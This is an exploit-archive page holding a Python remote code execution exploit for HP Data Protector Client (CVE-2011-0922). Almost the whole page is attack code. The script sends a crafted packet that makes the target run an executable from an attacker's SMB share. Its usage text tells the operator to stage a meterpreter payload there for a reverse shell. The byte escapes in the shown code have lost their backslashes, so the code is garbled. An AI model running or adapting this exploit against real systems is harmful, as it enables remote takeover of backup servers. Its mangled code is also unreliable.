HP Data Protector Client EXEC_CMD Remote Code Execution

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : HP Data Protector Client EXEC_CMD Remote Code Execution
# Published : 2012-06-19
# Author :
# Previous Title : AdminStudio LaunchHelp.dll ActiveX Arbitrary Code Execution
# Next Title : ALLMediaServer 0.8 Buffer Overflow

#!/usr/bin/env python

# Exploit Title: HP Data Protector Client EXEC_CMD Remote Code Execution Vulnerability
# Date: 2012-12-06
# Exploit Author: Ben Turner
# Vendor Homepage: www.hp.com
# Version: 6.11 & 6.20
# Tested on: Windows 2003 Server SP2 en
# CVE: CVE-2011-0922
# Notes: ZDI-11-056
# Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-056/
# Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143


import socket
import sys
import binascii

if len(sys.argv) != 4:
    print ""
    print "33[0;31mUsage: ./hp_protector.py <Target IP> <Port> <Reverse IP> 33[0m" 
    print ""
    print "33[0;32mMake sure you create a meterpreter payload and a share with the following \\<Reverse IP>\Omniback\i386\installservice.exe33[0m" 
    print "33[0;32mAlso make sure the SYSTEM account on windows can access your share, this is not always trivial33[0m"
    print ""
    sys.exit(1)
host = sys.argv[1]
port = int(sys.argv[2])
lhost = sys.argv[3]

# Create a Share with the following:
# Ensure you can access that share with the SYSTEM account on a machine - 
#
# \ipaddressOmnibacki386installservice.exe


b = ''

for char in lhost:
	a = "x00"+char
	b = b + a

#print b


payload = ("x00x00x01xbexffxfex32x00x00x00x20"
+ b + 
"x00x00x00x20x00x30x00"
"x00x00x20x00x53x00x59x00x53x00x54x00x45x00x4dx00"
"x00x00x20x00x4ex00x54x00x20x00x41x00x55x00x54x00"
"x48x00x4fx00x52x00x49x00x54x00x59x00x00x00x20x00"
"x43x00x00x00x20x00x32x00x36x00x00x00x20x00x5cx00"
"x5c"
+ b +
"x00x5cx00x4fx00x6dx00x6ex00x69x00x62x00"
"x61x00x63x00x6bx00x5cx00x69x00x33x00x38x00x36x00"
"x5cx00x69x00x6ex00x73x00x74x00x61x00x6cx00x6cx00"
"x73x00x65x00x72x00x76x00x69x00x63x00x65x00x2ex00"
"x65x00x78x00x65x00x20x00x2dx00x73x00x6fx00x75x00"
"x72x00x63x00x65x00x20x4fx00x6dx00x6ex00x69x00x62"
"x00x61x00x63x00x6bx00x20x00x5cx00x5c"
+ b +
"x5cx00x5cx00x4fx00"
"x6dx00x6ex00x69x00x62x00x61x00x63x00x6bx00x5cx00"
"x69x00x33x00x38x00x36x00x5cx00x69x00x6ex00x73x00"
"x74x00x61x00x6cx00x6cx00x73x00x65x00x72x00x76x00"
"x69x00x63x00x65x00x2ex00x65x00x78x00x65x00x20x00"
"x2dx00x73x00x6fx00x75x00x72x00x63x00x65x00x20x00"
"x5cx00x5c"
+ b +
"x00x5cx00x4fx00x6dx00x6ex00x69x00x62x00x61x00x63"
"x00x6bx00x20x00x00x00x00x00x00x00x02x54"
"xffxfex32x00x36x00x00x00x20x00x5bx00x30x00x5dx00"
"x41x00x44x00x44x00x2fx00x55x00x50x00x47x00x52x00"
"x41x00x44x00x45x00x0ax00x5cx00x5c"
+ b +
"x00x5cx00x4fx00x6dx00x6ex00x69x00x62x00x61x00x63"
"x00x6bx00x5cx00x69x00x33x00x38x00x36x00")

print payload

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "Sending payload"
s.send(payload)
while 1:
        data = s.recv(4096)
        if data:
                print data
        else:
                break
s.close()